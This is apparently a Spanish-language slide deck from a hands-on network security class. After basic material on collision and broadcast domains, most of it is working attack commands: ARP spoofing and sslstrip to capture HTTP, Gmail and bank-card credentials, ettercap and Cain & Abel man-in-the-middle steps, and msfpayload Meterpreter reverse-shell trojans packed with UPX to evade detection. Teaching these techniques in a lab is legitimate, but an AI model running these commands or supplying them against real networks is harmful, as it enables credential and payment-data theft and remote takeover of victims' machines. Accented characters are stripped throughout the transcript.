conceptos generales linux

7
Conceptos Generales: Una colisión en ethernet es el resultado, de dos nodos que transmiten de forma simultanea. Las tramas chocan y se dañan cuando se encuentran en el medio físico. Un dominio de colisión en ethernet es el área de la red dentro del cual las tramas que ha sufrido colisiones se propagan. Un Broadcast es un paquete de datos que se envían a todos los nodos de la red. Los broadcast se identifican a través de una dirección de broadcast. Dominio de Broadcast es un conjunto de todos los dispositivos que reciben tramas de broadcast que se originan en cualquier dispositivo del conjunto.

Upload: jorge-pineda

Post on 16-Sep-2015

212 views

Category:

Documents


0 download

DESCRIPTION

as

TRANSCRIPT

Conceptos Generales:Una colisin en ethernet es el resultado, de dos nodos que transmiten de forma simultanea. Las tramas chocan y se daan cuando se encuentran en el medio fsico. Un dominio de colisinen ethernet es el rea de la red dentro del cual las tramas que ha sufrido colisiones se propagan. Un Broadcast es un paquete de datos que se envan a todos los nodos de la red. Los broadcast se identifican a travs de una direccin de broadcast. Dominio de Broadcast es un conjunto de todos los dispositivos que reciben tramas de broadcast que se originan en cualquier dispositivo del conjunto.

Switching (switch capa 2!)Dominio de Colisin Bridge multipuertoDecisiones de envo de datos en base a la direccin MAC destino contenida en cada frame.Router (switch capa 3!)Dominio de BroadcastCrear y mantener una tabla de enrutamiento de cada protocolo de la capa de red.Identificar el protocolo contenido en cada paquete, extraer la direccin destino de la capa de red y enviar los datos en base a la decisin de enrutamiento.

Slo una entidad de Capa 3, como un router o una LAN virtual (VLAN), puede detener un dominio de broadcast de Capa 3. Los routers y las VLAN se utilizan para segmentar los dominiosde colisin y de broadcast.

Wiresharkconseguir pass http (wiresharkhttp): Follow TCPStreamwww.cinemark-peru.com-> protocolos no seguros!!!!Haganlo Uds! (15 minutos)

Wiresharkconseguir pass ssh? (wiresharkssh): Follow TCPStream

Wireshark($ sudo apt-get install wireshark)Sniffing! :)wget http://192.168.14.100/cb/CSWAE.pdfComparar teoria TCP/IP con Wiresharkconseguir pdf (wiresharkpdf): Follow TCP StreamHaganlo Uds:(15 minutos)

Wiresharkwget http://192.168.14.100/cb/cb.pcapQUE ES?

envenamiento arp -> arpspoofarp -asolo dominio de broadcast!!!

$ sudo apt-get install dsniffWindows:ping x.x.x.xarp -aKali:cat /proc/sys/net/ipv4/ip_forwardecho "1" > /proc/sys/net/ipv4/ip_forward(hacer que el trfico fluya por nuestro ordenador)cat /proc/sys/net/ipv4/ip_forwardarpspoof -i eth0 -t 192.168.14.130 192.168.14.1arpspoof -i eth0 -t 192.168.14.1 192.168.14.130arp -a en el windows (comparar)Haganlo Uds! (combinen arpspoof y wireshark para los ejemplosde la primera parte, 30 minutos)

Qu ms?apt-get install driftnetdriftnet -i eth0 -vwireshark http (png) ->file export object http(ip.src == 192.168.0.3 || ip.dst == 192.168.0.3) && http.request(ip.src == 192.168.0.3 || ip.dst == 192.168.0.3) &&http.request.method == POST

Qu ms?sslstripiptables --t nat -A PREROUTING -p tcp --destination-port 80 -jREDIRECT --to-port 10000 (redirigir todo lo que va por el puerto80 hacia el 10000, que es donde sslstrip escucha)iptables -t nat -Lsslstrip -l 10000sslstrip y arpspoof para ver pass https://mail.google.comwireshark -> login(alumnos: combinen sslstrip y arpspoof para ver nmero de tarjetade bcp - 20 minutos)

Qu ms?ettercap GSniff--->Unified SniffingHosts---> Scan for hostsHost--->Hosts listSeleccione el Destino 1 (Vctima) y el Destino 2 (router, para poder sniffeartodo el trfico entre ellos.Mitm--->Arp poisoningStart--->Start Sniffing

Qu ms?cain & abelStart sniffer (icono verde arriba a la izquierda)Tab sniffer select hostsClick derecho Scan mac addressSelect APRAPRAdd to listStart APR

Qu ms?Spoofing IP (syn flood) -> filtrar ips ingreso fwSpoofing Web (web falsa!) -> educacinSpoofing DNS (dns falso!) -> asegurar server

Virus?msfpayload windows/meterpreter/reverse_tcp lhost=192.168.14.xxlport=443 X > troyano.exe

Virus?levantar console con handlemsfcli exploit/multi/handlerPAYLOAD=windows/meterpreter/reverse_tcp lhost=192.168.14.1xxlport=443 Emeterpreter:ifconfigroutepwd(haganlo uds mismos! 30 minutos)

Virus?Instalen UPX en Kali:http://upx.sourceforge.net/

Virus?tar -xjvf upx-3...

Virus?msfpayload windows/meterpreter/reverse_tcp lhost=192.168.14.xxlport=443 X > troyano.exe./upx -5 troyano.exe -o oculto.exe